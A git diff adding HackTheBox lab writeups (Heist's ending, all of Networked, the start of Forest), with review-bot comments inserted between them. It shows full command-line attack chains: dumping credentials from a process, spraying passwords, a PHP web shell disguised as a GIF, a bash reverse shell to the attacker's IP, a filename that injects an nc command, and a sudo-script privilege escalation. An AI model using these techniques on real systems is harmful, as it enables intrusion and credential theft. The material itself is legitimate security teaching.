+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → wget https://download.sysinternals.com/files/SysinternalsSuite.zip
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → mv ~/Downloads/SysinternalsSuite.zip .
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → unzip SysinternalsSuite.zip
+
+
+_Terminal 1:_
+
+
+ *Evil-WinRM* PS C:\Program Files> cd \users\chase\Documents
+ *Evil-WinRM* PS C:\users\chase\Documents> upload /home/nihilist/_HTB/Heist/procdump64.exe
+ Info: Uploading /home/nihilist/_HTB/Heist/procdump64.exe to C:\users\chase\Documents\procdump64.exe
+
+ Data: 455560 bytes of 455560 bytes copied
+
+ Info: Upload successful!
+
+
+once it's uploaded, we can basically dump the firefox process we mentionned earlier. we'll set a few flags to run the binary we uploaded : -accepteula (self explanatory) -ma (write a full dump file)
+
+
+ *Evil-WinRM* PS C:\users\chase\Documents> .\procdump64.exe -accepteula -ma 2204
+
+ ProcDump v9.0 - Sysinternals process dump utility
+ Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
+ Sysinternals - www.sysinternals.com
+
+ [15:30:36] Dump 1 initiated: C:\users\chase\Documents\firefox.exe_200218_153036.dmp
+ [15:30:36] Dump 1 writing: Estimated dump file size is 460 MB.
+ [15:30:38] Dump 1 complete: 460 MB written in 1.8 seconds
+ [15:30:38] Dump count reached.
+
+
+Be aware that the accepteula flag creates a registry entry, which is basically forensic artifact on the box. looking at the results :
+
+
+ Evil-WinRM* PS C:\users\chase\Documents> gci
+
+
+ Directory: C:\users\chase\Documents
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 2/18/2020 3:30 PM 470485425 firefox.exe_200218_153036.dmp
+ -a---- 2/18/2020 3:26 PM 341672 procdump64.exe
+
+
+
+We're getting a massive file so let's download it rather than printing it's contents in the reverse shell,
+
+_Terminal 1:_
+
+
+ *Evil-WinRM* PS C:\users\chase\Documents> download firefox.exe_200218_153036.dmp
+ Info: Downloading C:\users\chase\Documents\firefox.exe_200218_153036.dmp to firefox.exe_200218_153036.dmp
+
+
+We're downloading a massive file and it takes forever, so let's print out the contents of the .dmp file locally looking for passwords
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ?
+ → strings firefox.exe_200218_153036.dmp | grep pass [e501272]
+ "C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login;_password=4dD!5}x/re8]FBuZ&login;=
+ MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login;_password=4dD!5}x/re8]FBuZ&login;=
+ localhost/login.php?login_username=admin@support.htb&login;_password=4dD!5}x/re8]FBuZ&login;=
+ MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login;_password=4dD!5}x/re8]FBuZ&login;=
+ x:///chrome/toolkit/content/passwordmgr/
+ x:///chrome/en-US/locale/en-US/passwordmgr/
+
+
+Here we see that a certain password shows up : 4dD!5}x/re8]FBuZ for the user admin@support.htb
+
+
+
+Although it offers no progress whatsoever to log in as that user on the webservice so let's try our credentials somewhere else. let's update our users.txt
+
+
+ secret
+ admin
+ rout3r
+ support
+ chase
+ jason
+ administrator
+
+
+let's update our pass.txt
+
+
+ 4dD!5}x/re8]FBuZ
+
+
+With our updated users.txt, let's run crackmapexec once again with the password we just found.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt --shares
+ SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\support:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\chase:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\jason:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [+] SUPPORTDESK\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
+ SMB 10.10.10.149 445 SUPPORTDESK [+] Enumerated shares
+ SMB 10.10.10.149 445 SUPPORTDESK Share Permissions Remark
+ SMB 10.10.10.149 445 SUPPORTDESK ----- ----------- ------
+ SMB 10.10.10.149 445 SUPPORTDESK ADMIN$ READ,WRITE Remote Admin
+ SMB 10.10.10.149 445 SUPPORTDESK C$ READ,WRITE Default share
+ SMB 10.10.10.149 445 SUPPORTDESK IPC$ READ Remote IPC
+
+
+and we get matching credentials ! administrator:4dD!5}x/re8]FBuZ let's test out our freshly acquired credentials.
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Heist]
+ → python3 psexec.py administrator@10.10.10.149
+ Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
+
+ Password:
+ [*] Requesting shares on 10.10.10.149.....
+ [*] Found writable share ADMIN$
+ [*] Uploading file REyCZIUo.exe
+ [*] Opening SVCManager on 10.10.10.149.....
+ [*] Creating service BCMq on 10.10.10.149.....
+ [*] Starting service BCMq.....
+ [!] Press help for extra shell commands
+ Microsoft Windows [Version 10.0.17763.437]
+ (c) 2018 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>type \users\administrator\desktop\root.txt
+ 50XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
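Review bot: the login.php source printed after "Let's check out the most interesting one : login.php" follows directly on a `dir` of C:\inetpub\wwwroot that returned "Access to the path 'C:\inetpub\wwwroot' is denied", and the writeup never says which command or earlier step produced the file; add that, and put the listing in a fenced block so the opening `<?php` tag survives rendering (the snippet currently begins at `session_start();`). The same rendering damage hits the `strings firefox.exe_200218_153036.dmp | grep pass` output, which now reads `&login;_password=4dD!5}x/re8]FBuZ&login;=` although login.php checks `$_REQUEST['login_password']` and `$_REQUEST['login']`, so the query string was `&login_password=...&login=`. The users.txt written after the lookupsid run (secret, admin, rout3r, hazard, support, chase, jason) omits `Administrator` even though `500: SUPPORTDESK\Administrator (SidTypeUser)` is in that output; the account only appears in the second users.txt under Part 3, so either add it in the first list or say why it was left out. On the forensic remark after the procdump run: the `gci` that follows shows a 470485425-byte `firefox.exe_200218_153036.dmp` and `procdump64.exe` left in C:\users\chase\Documents, which are at least as visible to a defender as the EULA registry value, and the text should say so. Minor: `[hashes.org](hashes.org/search.php)` has no scheme and will resolve as a relative link, the smb_login `run` is shown with no output, and "Here we can see the progress graph :" in the Conclusion has no image after it.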
diff --git a/Easy/37.md b/Easy/37.md
new file mode 100644
index 0000000..9bb8c9e
--- /dev/null
+++ b/Easy/37.md
@@ -0,0 +1,472 @@
+# Writeup
+
+
+
+## Networked Introduction :
+
+Networked is an easy Linux box that was released back in August 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → nmap -F 10.10.10.146
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 10:28 GMT
+ Nmap scan report for 10.10.10.146
+ Host is up (0.099s latency).
+ Not shown: 97 filtered ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 443/tcp closed https
+
+ Nmap done: 1 IP address (1 host up) scanned in 2.67 seconds
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Networked]
+ → nmap -sCV -p22,80 10.10.10.146
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 10:28 GMT
+ Nmap scan report for 10.10.10.146
+ Host is up (0.098s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
+ | 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
+ |_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
+ 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
+ |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
+ |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Let's investigate the webservice running on port 80 using the curl command with the -sk flags.
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → curl -sk http://10.10.10.146
+ <****html> <****body>
+ Hello mate, we're building the new FaceMash! <****/br>
+ Help by funding us and be the new Tyler &Cameron;!<****/br>
+ Join us at the pool party this Sat to get a glimpse
+ <****/body> <****/html>
+
+Not much to see on the index page, so let's launch dirsearch to enumerate what directories we can find on the box.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Networked]
+ → dirsearch -u http://10.10.10.146/ -e txt,html,js,php -t 50
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, html, js, php | HTTP method: get | Threads: 50 | Wordlist size: 7126
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-18_10-32-21.log
+
+ Target: http://10.10.10.146/
+
+ [10:32:21] Starting:
+ [10:32:24] 403 - 213B - /.ht_wsr.txt
+ [10:32:24] 403 - 215B - /.htaccess-dev
+ [10:32:24] 403 - 217B - /.htaccess-local
+ [10:32:24] 403 - 206B - /.hta
+ [10:32:24] 403 - 217B - /.htaccess-marco
+ [10:32:24] 403 - 215B - /.htaccess.BAK
+ [10:32:24] 403 - 216B - /.htaccess.bak1
+ [10:32:24] 403 - 216B - /.htaccess.orig
+ [10:32:24] 403 - 215B - /.htaccess.old
+ [10:32:24] 403 - 216B - /.htaccess.save
+ [10:32:24] 403 - 218B - /.htaccess.sample
+ [10:32:24] 403 - 215B - /.htaccess.txt
+ [10:32:24] 403 - 217B - /.htaccess_extra
+ [10:32:24] 403 - 216B - /.htaccess_orig
+ [10:32:24] 403 - 214B - /.htaccess_sc
+ [10:32:24] 403 - 214B - /.htaccessBAK
+ [10:32:24] 403 - 214B - /.htaccessOLD
+ [10:32:24] 403 - 215B - /.htaccessOLD2
+ [10:32:24] 403 - 212B - /.htaccess~
+ [10:32:24] 403 - 210B - /.htgroup
+ [10:32:24] 403 - 215B - /.htpasswd-old
+ [10:32:24] 403 - 216B - /.htpasswd_test
+ [10:32:24] 403 - 212B - /.htpasswds
+ [10:32:24] 403 - 210B - /.htusers
+ [10:32:34] 301 - 235B - /backup -> http://10.10.10.146/backup/
+ [10:32:34] 200 - 885B - /backup/
+ [10:32:35] 403 - 210B - /cgi-bin/
+ [10:32:39] 200 - 229B - /index.php
+ [10:32:39] 200 - 229B - /index.php/login/
+ [10:32:48] 200 - 169B - /upload.php
+ [10:32:48] 301 - 236B - /uploads -> http://10.10.10.146/uploads/
+ [10:32:48] 200 - 2B - /uploads/
+
+
+here we have a few interesting results : /backup , /upload.php and /uploads/ , Let's move over to /upload.php and upload our nihilist.php which will basically grab the html GET Variable "nihilist" and pass it to the system command which will execute it.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Networked]
+ → nano nihilist.py
+
+
+
+ <****?php system($_GET['nihilist']); ?>
+
+
+
+Uploading the php file we get an error message "invalid image file". Earlier on our dirsearch scan found the /backup/ directory so navigating there we see a file named backup.tar ready for us to download, so let's do so using wget.
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → wget http://10.10.10.146/backup/backup.tar && exiftool backup.tar
+ --2020-02-18 10:47:23-- http://10.10.10.146/backup/backup.tar
+ Connecting to 10.10.10.146:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 10240 (10K) [application/x-tar]
+ Saving to: ‘backup.tar’
+
+ backup.tar 100%[==================>] 10.00K --.-KB/s in 0.004s
+
+ 2020-02-18 10:47:23 (2.26 MB/s) - ‘backup.tar’ saved [10240/10240]
+
+ ExifTool Version Number : 11.86
+ File Name : backup.tar
+ Directory : .
+ File Size : 10 kB
+ File Modification Date/Time : 2019:07:09 12:33:42+01:00
+ File Access Date/Time : 2020:02:18 10:47:23+00:00
+ File Inode Change Date/Time : 2020:02:18 10:47:23+00:00
+ File Permissions : rw-r--r--
+ File Type : TAR
+ File Type Extension : tar
+ MIME Type : application/x-tar
+ Warning : Unsupported file type
+
+
+so we get a regular tar file, let's just extract it with tar -xvf
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → tar -xvf backup.tar
+ index.php
+ lib.php
+ photos.php
+ upload.php
+
+
+so we get a bunch of php files , now we are trying to see in what ways a user can interact with the server, so we'll use the following grep command and look at it's results
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → grep -Ri '$_' *
+
+ Binary file backup.tar matches
+ nihilist.php:
+ lib.php:<****form action=" " method="post" enctype="multipart/form-data">
+ photos.php: if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) {
+ upload.php:if( isset($_POST['submit']) ) {
+ upload.php: if (!empty($_FILES["myFile"])) {
+ upload.php: $myFile = $_FILES["myFile"];
+ upload.php: if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
+ upload.php: //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
+ upload.php: $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → cat upload.php| grep type
+ if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
+
+
+Looking at the results, we see a few interesting variables , most notably the $_FILES global variable. we can also see that we must not upload a file that is too large, AND (&&) we need to make sure the check_file_type function allows us to proceed. so let's run the grep command again, this time looking for the check_file_type function :
+
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → grep -Ri 'check_file_type(' *
+ Binary file backup.tar matches
+ lib.php:function check_file_type($file) {
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → nano lib.php
+
+
+Looking at the results, we see it's being used in both upload.php and lib.php
+
+
+ function check_file_type($file) {
+ $mime_type = file_mime_type($file);
+ if (strpos($mime_type, 'image/') === 0) {
+ return true;
+ } else {
+ return false;
+ }
+ }
+
+
+looking at the function, we see that the file_mime_type function basically checks for [magic bytes](https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/) at the beginning of the uploaded file and seeing if it is actually an image. To test this , we can try and create our own false images :
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → echo "GIF8;nihilist" > test.txt
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → file test.txt
+ test.txt: GIF image data 26723 x 2608
+
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → nano nihilist.php
+
+
+
+ GIF8;
+
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → mv nihilist.php nihilist.php.gif
+
+
+next up we upload it, and browse to it
+
+  
+
+and from there, we can basically have command execution for example :
+
+
+ http://10.10.10.146/uploads/10_10_14_7.php.gif?nihilist=cat%20/etc/passwd
+
+ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin guly:x:1000:1000:guly:/home/guly:/bin/bash saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin
+
+ http://10.10.10.146/uploads/10_10_14_7.php.gif?nihilist=uname%20-a
+
+ GIF8;Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+
+
+ http://10.10.10.146/uploads/10_10_14_7.php.gif?nihilist=bash -i >& /dev/tcp/10.10.14.7/9001 0>&1
+
+
+Here we see that the previous URL does not work because we need to URL ENCODE the spaces, and & symbols, the spaces are + and the & are %26
+
+
+
+ http://10.10.10.146/uploads/10_10_14_7.php.gif?nihilist=bash+-i+>%26+/dev/tcp/10.10.14.7/9001+0>%261
+
+
+and we are catching the incoming reverse shell connection on our port 9001 :
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.7] from (UNKNOWN) [10.10.10.146] 56620
+ bash: no job control in this shell
+ bash-4.2$ uname -a
+ uname -a
+ Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+ bash-4.2$ cd /home/guly
+ cd /home/guly
+ bash-4.2$ ls -la
+ ls -la
+ total 28
+ drwxr-xr-x. 2 guly guly 159 Jul 9 2019 .
+ drwxr-xr-x. 3 root root 18 Jul 2 2019 ..
+ lrwxrwxrwx. 1 root root 9 Jul 2 2019 .bash_history -> /dev/null
+ -rw-r--r--. 1 guly guly 18 Oct 30 2018 .bash_logout
+ -rw-r--r--. 1 guly guly 193 Oct 30 2018 .bash_profile
+ -rw-r--r--. 1 guly guly 231 Oct 30 2018 .bashrc
+ -rw------- 1 guly guly 639 Jul 9 2019 .viminfo
+ -r--r--r--. 1 root root 782 Oct 30 2018 check_attack.php
+ -rw-r--r-- 1 root root 44 Oct 30 2018 crontab.guly
+ -r--------. 1 guly guly 33 Oct 30 2018 user.txt
+
+ bash-4.2$ uname -a
+ uname -a
+ Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+ bash-4.2$ whoami
+ whoami
+ apache
+
+
+
+But we are not yet able to print the user flag, because we do not have enough permissions. we are currently the user apache, so we need to escalate privlieges to the guly user.
+
+
+ bash-4.2$ cat check_attack.php
+ cat check_attack.php
+ $value) {
+ $msg='';
+ if ($value == 'index.html') {
+ continue;
+ }
+ #echo "-------------\n";
+
+ #print "check: $value\n";
+ list ($name,$ext) = getnameCheck($value);
+ $check = check_ip($name,$value);
+
+ if (!($check[0])) {
+ echo "attack!\n";
+ # todo: attach file
+ file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
+
+ exec("rm -f $logpath");
+ exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
+ echo "rm -f $path$value\n";
+ mail($to, $msg, $msg, $headers, "-F$value");
+ }
+ }
+
+ ?>
+
+
+so here we have the php sourcecode of check_attack.php, and you can see that it has a dangerous function here exec("") which is like the system() function we used earlier, it can basically execute anything. So let's look at a line in particular :
+
+
+ exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
+
+
+here we can see that we have no control over anything in this line EXCEPT for the $value variable, which is basically the name of the file, let's navigate over to /var/www/html/uploads/
+
+
+ bash-4.2$ cd /var/www/html/uploads
+ cd /var/www/html/uploads
+
+ bash-4.2$ nc -v
+ nc -v
+ Ncat: Version 7.50 ( https://nmap.org/ncat )
+ Ncat: You must specify a host to connect to. QUITTING
+
+
+From there, we see that netcat is available for us.
+
+_Terminal 1:_
+
+
+ bash-4.2$ touch -- ';nc -c bash 10.10.14.7 9002;.php'
+ touch -- ';nc -c bash 10.10.14.7 9002;.php'
+ bash-4.2$ ls
+ ls
+ 10_10_14_7.php.gif 127_0_0_2.png 127_0_0_4.png index.html
+ 127_0_0_1.png 127_0_0_3.png ;nc -c bash 10.10.14.7 9002;.php
+
+
+here we see that we have the filename we want, which will replace our previous $value and seamlessly give us another reverse shell. we ready our other terminal.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.7] from (UNKNOWN) [10.10.10.146] 50702
+ uname -a
+ Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ [guly@networked ~]$
+
+
+and now we have upgraded our reverse shell to a tty using python's pty.spawn() function
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.7] from (UNKNOWN) [10.10.10.146] 50708
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ [guly@networked ~]$ cat /home/guly/user.txt
+ cat /home/guly/user.txt
+ 52XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to privesc on a linux machine, a good reflex to have is to try out the sudo -l command
+
+
+ [guly@networked ~]$ sudo -l
+ sudo -l
+ Matching Defaults entries for guly on networked:
+ !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
+ env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
+ env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
+ env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
+ env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
+ env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
+ secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
+
+ User guly may run the following commands on networked:
+ (root) NOPASSWD: /usr/local/sbin/changename.sh
+
+ [guly@networked ~]$ ls -la /usr/local/sbin/changename.sh
+ ls -la /usr/local/sbin/changename.sh
+ -rwxr-xr-x 1 root root 422 Jul 8 2019 /usr/local/sbin/changename.sh
+
+
+We see that the script changename.sh may be run as root with no password although as you can see from the result of our second command, we do not have the writing rights to it as it is owned by the root user, so let's check what it does :
+
+
+ [guly@networked ~]$ cat /usr/local/sbin/changename.sh
+ cat /usr/local/sbin/changename.sh
+ #!/bin/bash -p
+ cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
+ DEVICE=guly0
+ ONBOOT=no
+ NM_CONTROLLED=no
+ EoF
+
+ regexp="^[a-zA-Z0-9_\ /-]+$"
+
+ for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
+ echo "interface $var:"
+ read x
+ while [[ ! $x =~ $regexp ]]; do
+ echo "wrong input, try again"
+ echo "interface $var:"
+ read x
+ done
+ echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
+ done
+
+ /sbin/ifup guly0
+
+
+basically the vulnerability here is, that if we put a space in any of the variables, once the commands we want is being put in the config file, when the script is going to read it, it is going to execute our command for us , as root.
+
+
+ [guly@networked ~]$ sudo /usr/local/sbin/changename.sh
+ sudo /usr/local/sbin/changename.sh
+ interface NAME:
+ nihilist
+ nihilist
+ interface PROXY_METHOD:
+ nihilist
+ nihilist
+ interface BROWSER_ONLY:
+ nihilist bash
+ nihilist bash
+ interface BOOTPROTO:
+ TCP
+ TCP
+ [root@networked network-scripts]# cat /root/root.txt
+ cat /root/root.txt
+ 0aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to privesc, and print out the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
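Review bot: the sentence explaining the changename.sh weakness ("if we put a space in any of the variables, once the commands we want is being put in the config file ...") is both ungrammatical and vague about the actual root cause, which the listed script makes visible: `regexp="^[a-zA-Z0-9_\ /-]+$"` deliberately admits a space, the value is written unquoted with `echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly`, and `/sbin/ifup guly0` sources that file as shell, so the second word of a value like `nihilist bash` is run as a command with the script's root privileges. Suggest rewriting the paragraph to state this chain (regex permits whitespace, unquoted write, ifcfg file sourced by ifup) and adding the hardening takeaway a reader should leave with: reject whitespace in the validation regex or quote the written value, and do not grant NOPASSWD sudo to scripts that generate files consumed by network-scripts. Two smaller points in the same region: "we do not have the writing rights to it" should read "write permission", and the "Conclusion" heading is followed by "Here we can see the progress graph :" with no image reference, so the markdown renders an empty section.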
diff --git a/Easy/38.md b/Easy/38.md
new file mode 100644
index 0000000..3b1ec43
--- /dev/null
+++ b/Easy/38.md
@@ -0,0 +1,674 @@
+# Forest Writeup
+
+
+
+## Introduction :
+
+Forest is an easy windows box released back in October 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/27 ] [Documents/Github/void.yt]
+ → nmap -sCV 10.10.10.161
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 17:55 CEST
+ Nmap scan report for 10.10.10.161
+ Host is up (0.34s latency).
+ Not shown: 989 closed ports
+ PORT STATE SERVICE VERSION
+ 53/tcp open domain Simple DNS Plus
+ 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-24 16:10:35Z)
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
+ 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
+ 464/tcp open kpasswd5?
+ 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+ 636/tcp open tcpwrapped
+ 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
+ 3269/tcp open tcpwrapped
+ Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 2h34m28s, deviation: 4h02m30s, median: 14m28s
+ | smb-os-discovery:
+ | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
+ | Computer name: FOREST
+ | NetBIOS computer name: FOREST\x00
+ | Domain name: htb.local
+ | Forest name: htb.local
+ | FQDN: FOREST.htb.local
+ |_ System time: 2021-05-24T09:10:39-07:00
+ | smb-security-mode:
+ | account_used:
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: required
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled and required
+ | smb2-time:
+ | date: 2021-05-24T16:10:42
+ |_ start_date: 2021-05-24T16:09:41
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up the RPC service, so let's run enum4linux:
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → enum4linux 10.10.10.161
+ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 24 18:06:21 2021
+ [...]
+ user:[Administrator] rid:[0x1f4]
+ user:[Guest] rid:[0x1f5]
+ user:[krbtgt] rid:[0x1f6]
+ user:[DefaultAccount] rid:[0x1f7]
+ user:[$331000-VK4ADACQNUCA] rid:[0x463]
+ user:[SM_2c8eef0a09b545acb] rid:[0x464]
+ user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
+ user:[SM_75a538d3025e4db9a] rid:[0x466]
+ user:[SM_681f53d4942840e18] rid:[0x467]
+ user:[SM_1b41c9286325456bb] rid:[0x468]
